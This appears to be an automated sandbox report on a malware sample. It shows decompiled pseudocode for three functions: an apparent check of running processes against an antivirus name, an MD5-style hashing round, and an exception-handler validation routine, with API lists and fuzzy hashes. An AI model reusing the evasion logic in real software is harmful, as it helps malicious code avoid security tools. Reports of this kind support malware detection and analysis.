    • Instruction ID: f009f4af942ad5150650379ae4bca2978197d0ef69224ba64775341cebae375d
    • Opcode Fuzzy Hash: 0a748a7ce164e67ee473836113b32f598ead1c02143be68165a9c1474dd4268a
    • Instruction Fuzzy Hash: 43F03AB0747301AFEBA0EF6AA80AB193BB8B744740F05451FE556D92D8D77A8012DF25
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0309513E, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E0309513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x309a2d4; // 0x3ccd5a8
						_t2 = _t9 + 0x309bdd4; // 0x73617661
						_push( &_v264);
						if( *0x309a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









    0x03095149
    0x03095153
    0x03095157
    0x03095161
    0x03095192
    0x03095168
    0x0309516d
    0x0309517a
    0x03095183
    0x0309519a
    0x03095185
    0x0309518d
    0x00000000
    0x0309518d
    0x0309519b
    0x0309519c
    0x00000000
    0x0309519c
    0x00000000
    0x03095196
    0x030951a2
    0x030951a7

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0309514E
    • Process32First.KERNEL32(00000000,?), ref: 03095161
    • Process32Next.KERNEL32(00000000,?), ref: 0309518D
    • CloseHandle.KERNEL32(00000000), ref: 0309519C
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 420147892-0
    • Opcode ID: f7c5ae05db8471791b260ab750a064565ab5312d5230c65fca1d8584b86ec57b
    • Instruction ID: 24ab05e16baabeecafbe57bd689d33b0cd1224b26f82ba87540cdfa02c94e4c7
    • Opcode Fuzzy Hash: f7c5ae05db8471791b260ab750a064565ab5312d5230c65fca1d8584b86ec57b
    • Instruction Fuzzy Hash: CFF0BB752031246AFF62F76B9C58DDB77ACDBC6310F050163F955C6000E63499569AA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03093109, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 50%
    			E03093109(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































    0x0309310c
    0x03093117
    0x0309311a
    0x0309311d
    0x0309311e
    0x0309311e
    0x03093129
    0x0309313a
    0x0309313c
    0x0309313f
    0x0309313f
    0x03093142
    0x03093142
    0x03093145
    0x03093145
    0x03093148
    0x03093148
    0x03093165
    0x03093168
    0x0309317e
    0x03093181
    0x0309319b
    0x0309319e
    0x030931b4
    0x030931b7
    0x030931b9
    0x030931d1
    0x030931d4
    0x030931d7
    0x030931ef
    0x030931f2
    0x0309320c
    0x0309320f
    0x03093225
    0x03093228
    0x0309322a
    0x03093242
    0x03093247
    0x0309324a
    0x03093260
    0x03093263
    0x0309327d
    0x03093280
    0x03093296
    0x03093299
    0x0309329b
    0x030932b6
    0x030932b9
    0x030932d0
    0x030932d3
    0x030932d7
    0x030932f0
    0x030932f3
    0x030932f5
    0x030932f8
    0x03093313
    0x03093316
    0x0309332f
    0x03093332
    0x03093342
    0x03093345
    0x0309335d
    0x03093360
    0x0309337a
    0x0309337d
    0x03093395
    0x03093398
    0x030933ae
    0x030933b1
    0x030933c9
    0x030933cc
    0x030933e4
    0x030933e7
    0x03093401
    0x03093404
    0x0309341a
    0x0309341d
    0x03093435
    0x03093438
    0x03093452
    0x03093455
    0x0309346d
    0x03093470
    0x03093486
    0x03093489
    0x030934a1
    0x030934a4
    0x030934bc
    0x030934bf
    0x030934d1
    0x030934d4
    0x030934e6
    0x030934e9
    0x030934fb
    0x030934fe
    0x03093502
    0x03093512
    0x03093515
    0x03093523
    0x03093526
    0x03093538
    0x0309353b
    0x0309354f
    0x03093552
    0x03093554
    0x03093564
    0x03093567
    0x03093579
    0x0309357c
    0x0309358a
    0x0309358d
    0x0309359f
    0x030935a2
    0x030935a6
    0x030935b6
    0x030935b9
    0x030935cb
    0x030935ce
    0x030935dc
    0x030935df
    0x030935f1
    0x030935f4
    0x03093606
    0x03093609
    0x0309361d
    0x03093620
    0x03093634
    0x03093637
    0x0309364b
    0x0309364e
    0x03093662
    0x03093665
    0x03093679
    0x0309367c
    0x03093690
    0x03093695
    0x030936a7
    0x030936aa
    0x030936be
    0x030936c1
    0x030936d5
    0x030936d8
    0x030936ee
    0x030936f1
    0x03093705
    0x03093708
    0x0309371a
    0x0309371d
    0x03093731
    0x03093734
    0x03093748
    0x0309374b
    0x0309375f
    0x03093768
    0x0309376b
    0x03093774
    0x0309377d
    0x03093785
    0x0309378d
    0x03093797
    0x030937ac

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: memset
    • String ID:
    • API String ID: 2221118986-0
    • Opcode ID: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
    • Instruction ID: ed0fcfc704524c6620b97a308e74a100d38dd9de669f55763b43e8d723c72b01
    • Opcode Fuzzy Hash: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
    • Instruction Fuzzy Hash: 5A22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03098005, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E03098005(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x309a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x309a378 = 1;
										__eflags =  *0x309a378;
										if( *0x309a378 != 0) {
											goto L60;
										}
										_t84 =  *0x309a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x309a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x309a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x309a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x309a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x309a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x309a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x309a378 = 1;
							__eflags =  *0x309a378;
							if( *0x309a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x309a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x309a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x309a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x309a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x309a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x309a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x309a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































    0x0309800f
    0x03098012
    0x03098018
    0x03098036
    0x00000000
    0x03098036
    0x03098020
    0x03098029
    0x0309802f
    0x0309803e
    0x03098041
    0x03098044
    0x0309804e
    0x0309804e
    0x03098050
    0x03098053
    0x03098055
    0x03098055
    0x03098057
    0x0309805a
    0x00000000
    0x00000000
    0x0309805c
    0x0309805e
    0x030980c4
    0x030980c4
    0x03098222
    0x00000000
    0x03098222
    0x03098060
    0x03098060
    0x03098064
    0x03098066
    0x03098066
    0x03098066
    0x03098066
    0x03098069
    0x0309806a
    0x0309806d
    0x0309806d
    0x03098071
    0x03098075
    0x03098083
    0x03098083
    0x0309808b
    0x03098091
    0x03098093
    0x03098095
    0x030980a5
    0x030980b2
    0x030980b6
    0x030980bb
    0x030980bd
    0x0309813b
    0x0309813b
    0x030980bf
    0x030980bf
    0x030980bf
    0x0309813d
    0x0309813f
    0x03098220
    0x03098220
    0x00000000
    0x03098145
    0x03098145
    0x0309814c
    0x00000000
    0x00000000
    0x03098152
    0x03098156
    0x030981b2
    0x030981b4
    0x030981bc
    0x030981be
    0x030981c0
    0x00000000
    0x00000000
    0x030981c2
    0x030981c8
    0x030981ca
    0x030981cc
    0x030981e1
    0x030981e1
    0x030981e3
    0x03098212
    0x03098219
    0x00000000
    0x03098219
    0x030981e7
    0x030981e8
    0x030981ea
    0x030981ec
    0x030981ec
    0x030981ee
    0x030981f0
    0x030981f2
    0x03098206
    0x03098206
    0x03098209
    0x0309820b
    0x0309820b
    0x0309820c
    0x0309820c
    0x00000000
    0x030981f4
    0x030981f4
    0x030981f4
    0x030981fd
    0x030981fe
    0x03098200
    0x03098202
    0x03098202
    0x00000000
    0x030981f4
    0x030981f2
    0x030981ce
    0x030981d5
    0x030981d5
    0x030981d7
    0x00000000
    0x00000000
    0x030981d9
    0x030981da
    0x030981dd
    0x030981df
    0x00000000
    0x00000000
    0x00000000
    0x030981df
    0x00000000
    0x030981d5
    0x03098158
    0x0309815b
    0x03098160
    0x00000000
    0x00000000
    0x03098169
    0x0309816b
    0x03098171
    0x00000000
    0x00000000
    0x03098177
    0x0309817d
    0x00000000
    0x00000000
    0x03098183
    0x03098185
    0x0309818e
    0x03098192
    0x00000000
    0x00000000
    0x03098198
    0x0309819b
    0x0309819d
    0x00000000
    0x00000000
    0x030981a4
    0x030981a6
    0x00000000
    0x00000000
    0x030981a8
    0x030981ac
    0x00000000
    0x00000000
    0x00000000
    0x030981ac
    0x00000000
    0x00000000
    0x00000000
    0x03098097
    0x03098097
    0x03098097
    0x0309809e
    0x00000000
    0x00000000
    0x030980a0
    0x030980a1
    0x030980a3
    0x00000000
    0x00000000
    0x00000000
    0x030980a3
    0x030980cb
    0x030980cd
    0x00000000
    0x00000000
    0x030980dd
    0x030980df
    0x030980e1
    0x00000000
    0x00000000
    0x030980e7
    0x030980ee
    0x0309811a
    0x0309811a
    0x0309811c
    0x0309811e
    0x03098132
    0x03098134
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03098120
    0x03098120
    0x03098120
    0x03098129
    0x0309812a
    0x0309812c
    0x0309812e
    0x0309812e
    0x00000000
    0x03098120
    0x030980f0
    0x030980f0
    0x030980f3
    0x030980f5
    0x03098107
    0x03098107
    0x0309810a
    0x0309810c
    0x0309810c
    0x0309810d
    0x0309810d
    0x03098113
    0x03098113
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x030980f7
    0x030980f7
    0x030980f7
    0x030980fe
    0x00000000
    0x00000000
    0x03098100
    0x03098100
    0x03098101
    0x00000000
    0x00000000
    0x00000000
    0x03098101
    0x03098103
    0x03098105
    0x03098118
    0x00000000
    0x00000000
    0x00000000
    0x03098118
    0x00000000
    0x03098105
    0x03098077
    0x0309807a
    0x0309807d
    0x00000000
    0x00000000
    0x0309807f
    0x03098081
    0x00000000
    0x00000000
    0x00000000
    0x03098081
    0x03098046
    0x03098048
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 030980B6
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID:
    • API String ID: 2850889275-0
